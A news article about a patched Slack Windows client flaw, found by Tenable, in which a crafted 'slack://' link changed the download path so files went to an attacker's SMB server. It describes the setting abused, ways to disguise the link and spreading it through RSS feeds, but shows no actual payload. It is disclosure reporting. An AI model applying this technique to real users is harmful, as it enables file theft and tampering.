A bug discovered in Slack, the workplace messaging app, may have allowed an attacker to intercept files downloaded from inside Slack’s Windows desktop client, according to security researchers.
An attacker would introduce a malicious link into a Slack channel that, if clicked, would silently alter the download-location setting of the victim’s client to a file server owned by the attacker. This according to a researcher at Tenable, the Maryland-based cybersecurity firm.
The flaw was patched in Slack version 3.4.0, Tenable said. Users are advised to confirm that their Windows version of Slack is up to date.
Slack said the issue was reported by Tenable through its bug bounty program at HackerOne: “Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to [update] their apps and clients to the last available version.”
Tenable researcher David Wells said the bug “would allow all future downloaded documents by the victim to end up being uploaded to an attacker owned file server until the setting is manually changed back by the victim.” The attacker could not only steal any downloaded files with this method but could then modify them as well to include a malicious package. “The options from there on,” Wells wrote, “are endless.”
The discovery came as Wells was examining which Slack settings could be altered using “slack://” hyperlinks inside the client. A “slack://” link may include, for instance, “PrefSSBFileDownloadPath,” which allows for the download destination to be altered automatically if any user clicks the link. The new destination remains in place until the user manually changes it back.
Wells found that while they could not redirect files to another location on the target’s computer because the destination path in the “slack://” link can’t include a colon (:) character. They could, however, send the files to a shared location using Windows’ Server Message Block (SMB) protocol.
The link below, for example, if clicked by a user, would redirect any future files they download to the shared SMB server.
Wells notes that security-conscious users would be unlikely to click on such a link. It can be obscured, however, using Slack’s attachments feature, which allows for a text hyperlink. The linked text can even be modified, making it appear as it leads to another domain, such as google.com.
Wells also theorized, creatively, that attackers could introduce the malicious link into Slack channels that they aren’t apart or aware of using RSS feeds—links from which may auto-populate inside Slack channels subscribed to them. For instance, an attacker could post on Reddit a normal-looking HTTP link that actually redirects to a malicious “slack://” link. Any Slack channel subscribed to that specific subreddit’s RSS feed would then see the link inside their chat.
“These attempts could be unmasked by savvy Slack users, however, if decades of phishing campaigns have taught us anything, it’s that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting,” Wells said.
Renaud Deraison, Tenable’s cofounder and chief technology officer, added that emerging technologies aimed at offering “seamless connectivity” can also leave organizations vulnerable. It’s important, they said, companies realize that added connectivity can also mean expanding their attack surface.